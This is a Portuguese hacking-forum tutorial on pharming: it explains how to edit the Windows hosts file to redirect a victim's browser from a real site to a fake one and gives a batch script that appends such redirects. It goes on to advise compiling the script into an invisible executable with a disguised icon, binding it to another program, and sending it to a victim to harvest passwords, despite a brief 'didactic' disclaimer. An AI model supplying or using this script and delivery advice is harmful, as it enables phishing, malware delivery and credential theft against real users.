Resolvi fazer esse tutorial pois apesar de ter encontrado alguns artigos sobre Pharming, não encontrei nenhum desse gênero aqui no fórum. Gostaria de ressaltar também que esse tutorial é apenas didático e que portanto uso mal intencionado dele é de sua inteira responsabilidade.
Pharming é uma técnica bastante conhecida entre os hackers que praticam o phishing pois é de grande utilidade na arquitetura do golpe, principalmente quando se tem uma vítima pré-estabelecida, afinal a técnica se baseia em fazer o navegador da vítima redirecionar o site que ela digitou para um site falso, a fim de roubar dados pessoais e senhas que por ventura ela digitar nesse site, e com a vantagem de não ser detectado por antivírus e firewall.
Existem vários tipos de pharming, mas hoje irei mostrar um em específico que visa alterar o arquivo hosts do computador da vítima. O arquivo hosts, que não possui extensão, é onde ficavam gravados os endereços IP’s referentes a domínios -- mais conhecidos como sites --, devido ao fato de antigamente não existir domínio DNS. E como a cabeça das pessoas grava melhor palavras do que seqüências numéricas, como IP’s por exemplo, o arquivo hosts servia para guardar esses dados para as pessoas. Porém se usado da forma incorreta, ele pode ser configurado para redirecionar um site verdadeiro para um site falso, e se um hacker conseguir isso, vocês já imaginam o que pode acontecer... e é o que vamos mostrar a seguir.
A explicação do próprio arquivo hosts já ensina como praticar o Pharming:
- Código:
# Copyright (c) 1993-1999 Microsoft Corp. # # Este é um arquivo HOSTS de exemplo usado pelo Microsoft TCP/IP para Windows. # # Este arquivo contém os mapeamentos de endereços IP para nomes de host. Cada # entrada deve ser mantida em uma linha individual. O endereço IP deve # ser colocado na primeira coluna, seguido do nome de host correspondente. # O endereço IP e o nome do host devem ser separados por pelo menos um # espaço. # # Adicionalmente, comentários (como estes) podem ser inseridos em linhas # individuais ou após o nome de computador indicado por um símbolo '#'. # # Por exemplo: # # 102.54.94.97 rino.acme.com # servidor de origem # 38.25.63.10 x.acme.com # host cliente x 127.0.0.1 localhost
INICIANDO O PHARMING
1.1. Clique em Iniciar > Executar, digite: %WINDIR%\system32\drivers\etc\hosts e tecle Enter. Ou se preferir vá em C:\WINDOWS\system32\drivers\etc e dê duplo clique em hosts. Escolha abrir com o Bloco de Notas.
1.2. Abaixo da linha “127.0.0.1 localhost” insira o endereço IP do site falso e em seguida, dê um espaço e digite o endereço dns do site verdadeiro que você quer que seja redirecionado. Exemplo: “200.176.3.142 http://www.uol.com.br”, neste exemplo quando a pessoa tentar acessar o site do UOL ela será redirecionada para um outro site, que no caso é o Terra. Se você não souber qual é o IP do site basta abrir o console: Iniciar > Executar: cmd e digitar “ping http://www.site.com.br” que o IP do site aparecerá no console, como ilustra a imagem:
1.3. Assim que você terminar de editar o arquivo, -- lembrando que cada linha é um site e você não deve usar aspas – feche e salve-o. Agora entre no navegador e faça o teste para ver se está funcionando. Caso esteja tudo nos conformes vamos para a próxima parte, se não tiver redirecionado para o site que você quer então volte no início do tutorial e refaça tudo.
Você digitou http://www.uol.com.br. Tem certeza que o site é verdadeiro?
1.4. Bom, mas se for pra fazer um negócio desses no computador de alguém que você não tem acesso físico fica complicado demais, por isso agora vou ensinar você a fazer um batch script que faça todo o serviço pra você, assim só terá o trabalho de enviar para a vítima executar e criar a página fake para finalmente fazer o Phising. Primeiro abra um Bloco de Notas e cole o seguinte código:
- Código:
@echo off echo 200.000.000.001 http://www.siteoriginal.com >>%WINDIR%\system32\drivers\etc\hosts
E substitua o IP e o site pelo endereço IP do site falso e o DNS do site original, igual quando configuramos manualmente o arquivo hosts. Se tiver que fazer mais redirecionamentos basta colocar um em cada linha, deste modo:
- Código:
@echo off echo 200.000.000.001 http://www.siteoriginal.com >>%WINDIR%\system32\drivers\etc\hosts echo 300.000.000.001 http://www.siteoriginal2.com >>%WINDIR%\system32\drivers\etc\hosts echo 400.000.000.001 http://www.siteoriginal3.com >>%WINDIR%\system32\drivers\etc\hosts
E assim por diante…
1.5. Salve como arquivo.bat no tipo “Todos os arquivos”. Do jeito que está você já pode mandar pra vítima, mas se quiser fazer um serviço bem feito continue seguindo o tutorial, baixe o programa Bat To Exe Converter e transforme em um executável, sem ter problemas em abrir a janela do MS Dos enquanto ele é executado. Ele também tem a opção de alterar o ícone.
2.1. Clique no botão [...] e selecione o bat criado. Depois marque a opção Invisible application para não aparecer a tela do MS Dos, e para finalizar clique em Compile. Você pode também alterar o ícone dele clicando na aba Versioninformations e selecionando um ícone antes de compilar.
2.2. Agora que seu script está executável e com boa aparência, você pode usar um binder para uni-lo a outro arquivo executável e mandar para a vítima. (lembrando que se o binder tiver sido passado num scan online ele pode deixar seu arquivo detectável pelos antivírus) Outra forma também é hospedar e unir esse executável a uma técnica de auto-infect, ou mesmo compilar o código em JavaScript, para quem manja e usar um script para executar o arquivo .js dentro de um site.
É claro que essas duas últimas dicas seriam uma redundância, afinal a vítima teria que acessar um site para poder alterar as configurações dela para que ao acessar outro site ela entre no fake e por fim envie os dados para você, mas continuam valendo todas as dicas, e aqui no Invasão tem mais, inclusive tutoriais de como criar páginas fake. Mas cuidado, use sempre para sua didática.
Qualquer dúvida é só postar. Grande abraço,
0 comentários:
Postar um comentário